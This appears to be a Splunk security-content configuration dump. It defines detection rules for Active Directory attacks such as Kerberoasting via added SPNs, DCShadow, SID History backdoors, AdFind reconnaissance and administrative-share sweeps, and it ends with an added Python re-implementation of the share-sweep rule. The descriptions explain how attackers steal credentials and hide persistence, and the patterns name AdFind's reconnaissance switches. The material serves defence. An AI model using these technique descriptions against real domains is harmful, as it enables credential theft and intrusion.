An adversary who has obtained privileged access to a domain environment may add an SPN to a privileged account to then leverage the Kerberoasting technique and attempt to obtain its clertext password. action.notable.param.rule_title = Windows AD ServicePrincipalName Added To Domain Account action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `wineventlog_security` EventCode=5136 AttributeLDAPDisplayName=servicePrincipalName OperationType="%%14674" | stats values(ObjectDN) as ObjectDN by _time, Computer, SubjectUserName, AttributeValue | rename Computer as dest SubjectUserName as user | `windows_ad_serviceprincipalname_added_to_domain_account_filter` [ESCU - Windows AD Short Lived Domain Account ServicePrincipalName - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies the addition of a Service Principal Name to a domain account that is quickly deleted within 5 minutes or less. While this event may be part of a legitimate action part of certain administrative operations, it may also be evidence of a persistence attack. Domain accounts with Service Principal Names are vulnerable to a technique called Kerberoasting that enables attackers to potentially obtain the cleartext password of the account by performing offline cracking. An adversary who has obtained privileged access to a domain environment may add an SPN to a privileged account to then leverage the Kerberoasting technique and attempt to obtain its clertext password. To clean things up, the adversary may delete the SPN which will trigger this detection. 
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1098"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = The following analytic identifies the addition of a Service Principal Name to a domain account that is quickly deleted within 5 minutes or less. While this event may be part of a legitimate action part of certain administrative operations, it may also be evidence of a persistence attack. Domain accounts with Service Principal Names are vulnerable to a technique called Kerberoasting that enables attackers to potentially obtain the cleartext password of the account by performing offline cracking. An adversary who has obtained privileged access to a domain environment may add an SPN to a privileged account to then leverage the Kerberoasting technique and attempt to obtain its clertext password. To clean things up, the adversary may delete the SPN which will trigger this detection. action.escu.how_to_implement = To successfully implement this search, you ned to be ingesting eventcode `5136`. The Advanced Security Audit policy setting `Audit Directory Services Changes` within `DS Access` needs to be enabled. Additionally, a SACL needs to be created for AD objects in order to ingest attribute modifications. action.escu.known_false_positives = A Service Principal Name should only be added to an account when an application requires it. Adding an SPN and quickly deleting it is less common but may be part of legitimate action. Filter as needed. 
action.escu.creation_date = 2022-11-18 action.escu.modification_date = 2022-11-18 action.escu.confidence = high action.escu.full_search_name = ESCU - Windows AD Short Lived Domain Account ServicePrincipalName - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Windows"] action.escu.analytic_story = ["Sneaky Active Directory Persistence Tricks"] action.risk = 1 action.risk.param._risk_message = A Servince Principal Name for $user$ was set and shortly deleted action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 40}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Windows AD Short Lived Domain Account ServicePrincipalName - Rule action.correlationsearch.annotations = {"analytic_story": ["Sneaky Active Directory Persistence Tricks"], "cis20": ["CIS 10"], "confidence": 80, "impact": 50, "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1098"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic identifies the addition of a Service Principal Name to a domain account that is quickly deleted within 5 minutes or less. While this event may be part of a legitimate action part of certain administrative operations, it may also be evidence of a persistence attack. Domain accounts with Service Principal Names are vulnerable to a technique called Kerberoasting that enables attackers to potentially obtain the cleartext password of the account by performing offline cracking. 
An adversary who has obtained privileged access to a domain environment may add an SPN to a privileged account to then leverage the Kerberoasting technique and attempt to obtain its clertext password. To clean things up, the adversary may delete the SPN which will trigger this detection. action.notable.param.rule_title = Windows AD Short Lived Domain Account ServicePrincipalName action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `wineventlog_security` EventCode=5136 AttributeLDAPDisplayName=servicePrincipalName | transaction ObjectDN AttributeValue startswith=(EventCode=5136 OperationType="%%14674") endswith=(EventCode=5136 OperationType="%%14675") | eval short_lived=case((duration<300),"TRUE") | search short_lived = TRUE | rename ObjectDN as user | `windows_ad_short_lived_domain_account_serviceprincipalname_filter` [ESCU - Windows AD Short Lived Domain Controller SPN Attribute - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies when either a global catalog SPN or a DRS RPC SPN are temporarily added to an Active Directory computer object, both of which can be evidence of a DCShadow attack. DCShadow allows an attacker who has obtained privileged access to register a rogue Domain Controller (DC). Once registered, the rogue DC may be able to inject and replicate changes into the AD infrastructure for any domain object, including credentials and keys. This technique was initially released in 2018 by security researchers Benjamin Delpy and Vincent Le Toux. No event logs are written for changes to AD attributes, allowing for stealthy backdoors to be implanted in the domain, or metadata such as timestamps overwritten to cover tracks. 
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1207"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = The following analytic identifies when either a global catalog SPN or a DRS RPC SPN are temporarily added to an Active Directory computer object, both of which can be evidence of a DCShadow attack. DCShadow allows an attacker who has obtained privileged access to register a rogue Domain Controller (DC). Once registered, the rogue DC may be able to inject and replicate changes into the AD infrastructure for any domain object, including credentials and keys. This technique was initially released in 2018 by security researchers Benjamin Delpy and Vincent Le Toux. No event logs are written for changes to AD attributes, allowing for stealthy backdoors to be implanted in the domain, or metadata such as timestamps overwritten to cover tracks. action.escu.how_to_implement = To successfully implement this search, you need to be ingesting eventcode `5136`. The Advanced Security Audit policy setting `Audit Directory Services Changes` within `DS Access` needs to be enabled, alongside a SACL for `everybody` to `Write All Properties` applied to the domain root and all descendant objects. action.escu.known_false_positives = None. 
action.escu.creation_date = 2023-11-07 action.escu.modification_date = 2023-11-07 action.escu.confidence = high action.escu.full_search_name = ESCU - Windows AD Short Lived Domain Controller SPN Attribute - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Windows"] action.escu.analytic_story = ["Sneaky Active Directory Persistence Tricks"] action.risk = 1 action.risk.param._risk_message = Short Lived Domain Controller SPN AD Attribute Triggered by $src_user$ action.risk.param._risk = [{"risk_object_field": "src_user", "risk_object_type": "user", "risk_score": 100}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Windows AD Short Lived Domain Controller SPN Attribute - Rule action.correlationsearch.annotations = {"analytic_story": ["Sneaky Active Directory Persistence Tricks"], "cis20": ["CIS 10"], "confidence": 100, "impact": 100, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1207"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic identifies when either a global catalog SPN or a DRS RPC SPN are temporarily added to an Active Directory computer object, both of which can be evidence of a DCShadow attack. DCShadow allows an attacker who has obtained privileged access to register a rogue Domain Controller (DC). Once registered, the rogue DC may be able to inject and replicate changes into the AD infrastructure for any domain object, including credentials and keys. This technique was initially released in 2018 by security researchers Benjamin Delpy and Vincent Le Toux. 
No event logs are written for changes to AD attributes, allowing for stealthy backdoors to be implanted in the domain, or metadata such as timestamps overwritten to cover tracks. action.notable.param.rule_title = Windows AD Short Lived Domain Controller SPN Attribute action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `wineventlog_security` EventCode=5136 AttributeLDAPDisplayName=servicePrincipalName (AttributeValue="GC/*" OR AttributeValue="E3514235-4B06-11D1-AB04-00C04FC2DCD2/*") | stats min(_time) as _time range(_time) as duration values(OperationType) as OperationType values(user) as user values(src_ip) as src_ip values(src_nt_domain) as src_nt_domain values(src_user) as src_user values(Computer) as dest, values(ObjectDN) as ObjectDN by Logon_ID | eval short_lived=case((duration<30),"TRUE") | where short_lived="TRUE" AND mvcount(OperationType)>1 | replace "%%14674" with "Value Added", "%%14675" with "Value Deleted" in OperationType | rename Logon_ID as TargetLogonId | appendpipe [| map search="search `wineventlog_security` EventCode=4624 TargetLogonId=$TargetLogonId$"] | stats min(_time) as _time, values(ObjectDN) as ObjectDN values(OperationType) as OperationType by TargetLogonId src_user dest | `windows_ad_short_lived_domain_controller_spn_attribute_filter` [ESCU - Windows AD Short Lived Server Object - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies a change in an Active Directory environment that could represent evidence of the DCShadow attack. DCShadow allows an attacker who has obtained privileged access to register a rogue Domain Controller (DC). 
Once registered, the rogue DC may be able to inject and replicate changes in the AD infrastructure for any domain object, including credentials and keys. This technique was initially released in 2018 by security researchers Benjamin Delpy and Vincent Le Toux. Specifically, the detection will trigger when a possible rogue Domain Controller computer object is created and quickly deleted within 30 seconds or less in an Active Directory domain. This behavior was identfied by simulating the DCShadow attack with Mimikatz. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1207"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = The following analytic identifies a change in an Active Directory environment that could represent evidence of the DCShadow attack. DCShadow allows an attacker who has obtained privileged access to register a rogue Domain Controller (DC). Once registered, the rogue DC may be able to inject and replicate changes in the AD infrastructure for any domain object, including credentials and keys. This technique was initially released in 2018 by security researchers Benjamin Delpy and Vincent Le Toux. Specifically, the detection will trigger when a possible rogue Domain Controller computer object is created and quickly deleted within 30 seconds or less in an Active Directory domain. This behavior was identfied by simulating the DCShadow attack with Mimikatz. action.escu.how_to_implement = To successfully implement this search, you ned to be ingesting Event codes `5137` and `5141`. The Advanced Security Audit policy setting `Audit Directory Services Changes` within `DS Access` needs to be enabled. For these event codes to be generated, specific SACLs are required. action.escu.known_false_positives = Creating and deleting a server object within 30 seconds or less is unusual but not impossible in a production environment. Filter as needed. 
action.escu.creation_date = 2022-10-17 action.escu.modification_date = 2022-10-17 action.escu.confidence = high action.escu.full_search_name = ESCU - Windows AD Short Lived Server Object - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Windows"] action.escu.analytic_story = ["Sneaky Active Directory Persistence Tricks"] action.risk = 1 action.risk.param._risk_message = Potential DCShadow Attack Detected on $Computer$ action.risk.param._risk = [{"risk_object_field": "SubjectUserName", "risk_object_type": "other", "risk_score": 64}, {"risk_object_field": "Computer", "risk_object_type": "system", "risk_score": 64}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Windows AD Short Lived Server Object - Rule action.correlationsearch.annotations = {"analytic_story": ["Sneaky Active Directory Persistence Tricks"], "cis20": ["CIS 10"], "confidence": 80, "impact": 80, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1207"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic identifies a change in an Active Directory environment that could represent evidence of the DCShadow attack. DCShadow allows an attacker who has obtained privileged access to register a rogue Domain Controller (DC). Once registered, the rogue DC may be able to inject and replicate changes in the AD infrastructure for any domain object, including credentials and keys. This technique was initially released in 2018 by security researchers Benjamin Delpy and Vincent Le Toux. 
Specifically, the detection will trigger when a possible rogue Domain Controller server object is created and then deleted in under 30 seconds in an Active Directory domain. This behavior was identified by simulating the DCShadow attack with Mimikatz. action.notable.param.rule_title = Windows AD Short Lived Server Object action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `wineventlog_security` EventCode=5137 OR EventCode=5141 ObjectDN="*CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration*" | transaction ObjectDN startswith=(EventCode=5137) endswith=(EventCode=5141) | eval short_lived=case((duration<30),"TRUE") | search short_lived = TRUE | stats values(ObjectDN) values(signature) values(EventCode) by _time, Computer, SubjectUserName | `windows_ad_short_lived_server_object_filter` [ESCU - Windows AD SID History Attribute Modified - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic leverages event code `5136` to identify a modification of the SID History AD attribute. The SID history AD attribute allows users to inherit permissions from a separate AD account without group changes. Initially developed for access continuity when migrating user accounts to different domains, this attribute can also be abused by adversaries to stealthily grant access to a backdoor account within the same domain. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1134", "T1134.005"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = The following analytic leverages event code `5136` to identify a modification of the SID History AD attribute. 
The SID history AD attribute allows users to inherit permissions from a separate AD account without group changes. Initially developed for access continuity when migrating user accounts to different domains, this attribute can also be abused by adversaries to stealthily grant access to a backdoor account within the same domain. action.escu.how_to_implement = To successfully implement this search, you need to be ingesting eventcode `5136` (a directory service object was modified). The Advanced Security Audit policy setting `Audit Directory Services Changes` within `DS Access` needs to be enabled. Additionally, an auditing SACL covering attribute writes needs to exist on the AD objects of interest; without it no 5136 events are generated for their modifications. action.escu.known_false_positives = Domain mergers and migrations may generate large volumes of false positives for this analytic. action.escu.creation_date = 2022-11-16 action.escu.modification_date = 2022-11-16 action.escu.confidence = high action.escu.full_search_name = ESCU - Windows AD SID History Attribute Modified - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Windows"] action.escu.analytic_story = ["Sneaky Active Directory Persistence Tricks"] action.risk = 1 action.risk.param._risk_message = SID History AD attribute modified by $SubjectUserName$ for $ObjectDN$ action.risk.param._risk = [{"risk_object_field": "SubjectUserName", "risk_object_type": "other", "risk_score": 56}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Windows AD SID History Attribute Modified - Rule action.correlationsearch.annotations = {"analytic_story": ["Sneaky Active Directory Persistence Tricks"], "cis20": ["CIS 10"], "confidence": 70, "impact": 80, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1134", 
"T1134.005"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic leverages event code `5136` to identify a modification of the SID History AD attribute. The SID history AD attribute allows users to inherit permissions from a separate AD account without group changes. Initially developed for access continuity when migrating user accounts to different domains, this attribute can also be abused by adversaries to stealthily grant access to a backdoor account within the same domain. action.notable.param.rule_title = Windows AD SID History Attribute Modified action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `wineventlog_security` EventCode=5136 AttributeLDAPDisplayName=sIDHistory OperationType="%%14674" | stats values(ObjectDN) by _time, Computer, SubjectUserName, AttributeValue | `windows_ad_sid_history_attribute_modified_filter` [ESCU - Windows AdFind Exe - Rule] action.escu = 0 action.escu.enabled = 1 description = This search looks for the execution of `adfind.exe` with the command-line arguments it uses for its search functions (`-f` filter or `-b` base DN) combined with the arguments that normally accompany them (`objectcategory`, `-gcb` or `-sc`); see the usage page for details: https://www.joeware.net/freetools/tools/adfind/usage.htm. AdFind.exe is a powerful tool that is commonly used for querying and retrieving information from Active Directory (AD). While it is primarily designed for AD administration and management, it has been used by Wizard Spider, FIN6 and the actors behind SUNBURST. 
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1018"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This search looks for the execution of `adfind.exe` with the command-line arguments it uses for its search functions (`-f` filter or `-b` base DN) combined with the arguments that normally accompany them (`objectcategory`, `-gcb` or `-sc`); see the usage page for details: https://www.joeware.net/freetools/tools/adfind/usage.htm. AdFind.exe is a powerful tool that is commonly used for querying and retrieving information from Active Directory (AD). While it is primarily designed for AD administration and management, it has been used by Wizard Spider, FIN6 and the actors behind SUNBURST. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = AdFind is a command-line tool for AD administration and management that is also leveraged by various adversaries. The search matches on command-line arguments only and does not constrain the process name, so a renamed AdFind binary is still caught, but any other tool invoked with the same switches will match as well. Filter out legitimate administrator usage using the filter macro. 
action.escu.creation_date = 2023-06-13 action.escu.modification_date = 2023-06-13 action.escu.confidence = high action.escu.full_search_name = ESCU - Windows AdFind Exe - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Domain Trust Discovery", "IcedID", "NOBELIUM Group", "Graceful Wipe Out Attack"] action.risk = 1 action.risk.param._risk_message = Windows AdFind Exe action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 25}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Windows AdFind Exe - Rule action.correlationsearch.annotations = {"analytic_story": ["Domain Trust Discovery", "IcedID", "NOBELIUM Group", "Graceful Wipe Out Attack"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1018"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This search looks for the execution of `adfind.exe` with the command-line arguments it uses for its search functions (`-f` filter or `-b` base DN) combined with the arguments that normally accompany them (`objectcategory`, `-gcb` or `-sc`); see the usage page for details: https://www.joeware.net/freetools/tools/adfind/usage.htm. AdFind.exe is a powerful tool that is commonly used for querying and retrieving information from Active Directory (AD). While it is primarily designed for AD administration and management, it has been used by Wizard Spider, FIN6 and the actors behind SUNBURST. 
action.notable.param.rule_title = Windows AdFind Exe action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where (Processes.process="* -f *" OR Processes.process="* -b *") AND (Processes.process=*objectcategory* OR Processes.process="* -gcb *" OR Processes.process="* -sc *") by Processes.dest Processes.user Processes.process_name Processes.process Processes.parent_process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `windows_adfind_exe_filter` [ESCU - Windows Admin Permission Discovery - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic is developed to identify suspicious file creation in the root of the system drive (C:\). This tactic was observed in NjRAT as a means to ascertain whether the malware instance running on the compromised host possesses administrative privileges. The malware attempts to create a 'win.dat' file in the C:\ directory; because only administrators can create files there by default, success indicates that the process holds administrative privileges. This anomaly detection serves as a valuable pivot point for detecting NjRAT and other malware strains employing similar techniques to assess the privileges of their running instances without using token privilege API calls or PowerShell cmdlets. 
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1069.001"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This analytic is developed to identify suspicious file creation in the root of the system drive (C:\). This tactic was observed in NjRAT as a means to ascertain whether the malware instance running on the compromised host possesses administrative privileges. The malware attempts to create a 'win.dat' file in the C:\ directory; because only administrators can create files there by default, success indicates that the process holds administrative privileges. This anomaly detection serves as a valuable pivot point for detecting NjRAT and other malware strains employing similar techniques to assess the privileges of their running instances without using token privilege API calls or PowerShell cmdlets. action.escu.how_to_implement = To successfully implement this search you need to be ingesting file creation events (file name, full path, creating process and user) from your endpoints into the `Filesystem` node of the `Endpoint` data model. action.escu.known_false_positives = False positives may occur if there are legitimate accounts with the privilege to drop files in the root of the C drive. It's recommended to verify the legitimacy of such actions and the accounts involved. 
action.escu.creation_date = 2023-09-19 action.escu.modification_date = 2023-09-19 action.escu.confidence = high action.escu.full_search_name = ESCU - Windows Admin Permission Discovery - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["NjRAT"] action.risk = 1 action.risk.param._risk_message = A file was created in the root of drive C:\ on host $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 25}, {"threat_object_field": "file_name", "threat_object_type": "file_name"}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Windows Admin Permission Discovery - Rule action.correlationsearch.annotations = {"analytic_story": ["NjRAT"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1069.001"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = |tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Filesystem where Filesystem.file_name IN ("*.exe", "*.dll", "*.sys", "*.com", "*.vbs", "*.vbe", "*.js", "*.bat", "*.cmd", "*.pif", "*.lnk", "*.dat") by Filesystem.dest Filesystem.file_create_time Filesystem.process_id Filesystem.process_guid Filesystem.file_name Filesystem.file_path Filesystem.user | `drop_dm_object_name(Filesystem)` | eval dropped_file_path = split(file_path, "\\") | eval 
dropped_file_path_split_count = mvcount(dropped_file_path) | eval root_drive = mvindex(dropped_file_path,0) | where LIKE(root_drive, "C:") AND dropped_file_path_split_count = 2 | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `windows_admin_permission_discovery_filter` [ESCU - Windows Administrative Shares Accessed On Multiple Hosts - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic leverages Event IDs 5140 or 5145 to identify a source computer accessing Windows administrative shares (C$, ADMIN$ and IPC$) across a large number of remote endpoints. Specifically, the logic will trigger when a source endpoint accesses administrative shares on more than 30 target computers within a 5 minute timespan. This behavior could represent an adversary who is enumerating network shares across an Active Directory environment in search of sensitive files, a common technique leveraged by red teamers and threat actors. As environments differ across organizations, security teams should customize the thresholds of this detection as needed. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1135"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = The following analytic leverages Event IDs 5140 or 5145 to identify a source computer accessing Windows administrative shares (C$, ADMIN$ and IPC$) across a large number of remote endpoints. Specifically, the logic will trigger when a source endpoint accesses administrative shares on more than 30 target computers within a 5 minute timespan. This behavior could represent an adversary who is enumerating network shares across an Active Directory environment in search of sensitive files, a common technique leveraged by red teamers and threat actors. As environments differ across organizations, security teams should customize the thresholds of this detection as needed. 
action.escu.how_to_implement = To successfully implement this search, you need to be ingesting file share events. The Advanced Security Audit policy setting `Audit Detailed File Share` (which produces 5145) or `Audit File Share` (which produces 5140) within `Object Access` needs to be enabled. action.escu.known_false_positives = A single endpoint accessing Windows administrative shares across a large number of endpoints is not common behavior. Possible false positive scenarios include but are not limited to vulnerability scanners, administration systems and misconfigured systems. action.escu.creation_date = 2023-03-23 action.escu.modification_date = 2023-03-23 action.escu.confidence = high action.escu.full_search_name = ESCU - Windows Administrative Shares Accessed On Multiple Hosts - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Windows"] action.escu.analytic_story = ["Active Directory Privilege Escalation", "Active Directory Lateral Movement"] action.risk = 1 action.risk.param._risk_message = $IpAddress$ accessed administrative shares (ADMIN$, IPC$ or C$) on more than 30 endpoints in a timespan of 5 minutes. 
action.risk.param._risk = [{"risk_object_field": "host_targets", "risk_object_type": "system", "risk_score": 56}, {"risk_object_field": "IpAddress", "risk_object_type": "other", "risk_score": 56}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Windows Administrative Shares Accessed On Multiple Hosts - Rule action.correlationsearch.annotations = {"analytic_story": ["Active Directory Privilege Escalation", "Active Directory Lateral Movement"], "cis20": ["CIS 10"], "confidence": 80, "impact": 70, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1135"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic leverages Event IDs 5140 or 5145 to identify a source computer accessing Windows administrative shares (C$, ADMIN$ and IPC$) across a large number of remote endpoints. Specifically, the logic will trigger when a source endpoint accesses administrative shares on more than 30 target computers within a 5 minute timespan. This behavior could represent an adversary who is enumerating network shares across an Active Directory environment in search of sensitive files, a common technique leveraged by red teamers and threat actors. As environments differ across organizations, security teams should customize the thresholds of this detection as needed. 
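The 5-minute bucketing and distinct-target count this rule performs with `bucket span=5m` and `stats dc(Computer)`, reproduced in Python over constructed 5140/5145 events as an added example (not the ESCU search and not Splunk code). It keeps the rule's strict `> 30` comparison and adds a sweep that straddles a bucket boundary, to show the blind spot fixed time buckets leave. Field names mirror the Security log fields the search uses; the addresses, user names and host names are made up.

```python
import re
from collections import defaultdict

# 5140/5145 record the share as \\*\NAME (literal asterisk); the ESCU search's
# "\\\\*\\IPC$" is a wildcard that also matches that form.
ADMIN_SHARE = re.compile(r"^\\\\[^\\]+\\(ADMIN\$|IPC\$|C\$)$", re.IGNORECASE)

BASE = 1_700_000_400   # epoch seconds; a multiple of 300 and of 600, so it opens a bucket


def share_event(t, ip, user, target, share="IPC$", code=5145):
    """One file-share audit event with the fields the rule groups on (constructed)."""
    return {"_time": t, "EventCode": code, "IpAddress": ip, "SubjectUserName": user,
            "Computer": target, "ShareName": "\\\\*\\" + share}


# Constructed events (not real log data).
EVENTS = []
# A sweep: one source touches IPC$ on 35 distinct hosts within 70 s, two events per host.
for i in range(35):
    for _ in range(2):
        EVENTS.append(share_event(BASE + 2 * i, "10.1.2.3", "svc_scan", f"HOST{i:02d}"))
# Benign: an admin touching ADMIN$ on three hosts.
for i in range(3):
    EVENTS.append(share_event(BASE + 30 + i, "10.9.9.9", "jdoe", f"FS{i:02d}",
                              share="ADMIN$", code=5140))
# A sweep that straddles a bucket boundary: 20 hosts just before BASE+300, 20 just after.
for i in range(20):
    EVENTS.append(share_event(BASE + 280 + i, "10.5.5.5", "pentest", f"WS{i:02d}", share="C$"))
    EVENTS.append(share_event(BASE + 300 + i, "10.5.5.5", "pentest", f"WS{20 + i:02d}", share="C$"))
# A non-administrative share is ignored by the rule's filter.
EVENTS.append(share_event(BASE + 10, "10.1.2.3", "svc_scan", "HOST99", share="Public"))


def detect_share_sweep(events, span=300, threshold=30):
    """Group by (time bucket, IpAddress, SubjectUserName, EventCode) and count distinct
    target computers, as `bucket span=5m _time | stats dc(Computer) ...` does; alert when
    the count is strictly greater than threshold, matching `where unique_targets > 30`."""
    groups = defaultdict(lambda: {"targets": set(), "shares": set()})
    for e in events:
        if e["EventCode"] not in (5140, 5145) or not ADMIN_SHARE.match(e["ShareName"]):
            continue
        key = (e["_time"] - e["_time"] % span, e["IpAddress"], e["SubjectUserName"], e["EventCode"])
        groups[key]["targets"].add(e["Computer"])
        groups[key]["shares"].add(e["ShareName"])
    alerts = []
    for (bucket, ip, user, code), g in sorted(groups.items()):
        if len(g["targets"]) > threshold:
            alerts.append({"bucket": bucket, "IpAddress": ip, "SubjectUserName": user,
                           "EventCode": code, "unique_targets": len(g["targets"]),
                           "shares": sorted(g["shares"]),
                           "host_targets": sorted(g["targets"])})
    return alerts


if __name__ == "__main__":
    for a in detect_share_sweep(EVENTS):
        print(f"{a['IpAddress']} ({a['SubjectUserName']}) hit {a['unique_targets']} hosts "
              f"via {a['shares']} in bucket starting {a['bucket']}")
```

The 40-host sweep split 20/20 across the BASE+300 boundary is missed at `span=300` and caught at `span=600`; if that matters in your environment, a sliding window or a lower threshold is the usual fix, at the cost of more noise from scanners and administration tooling.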
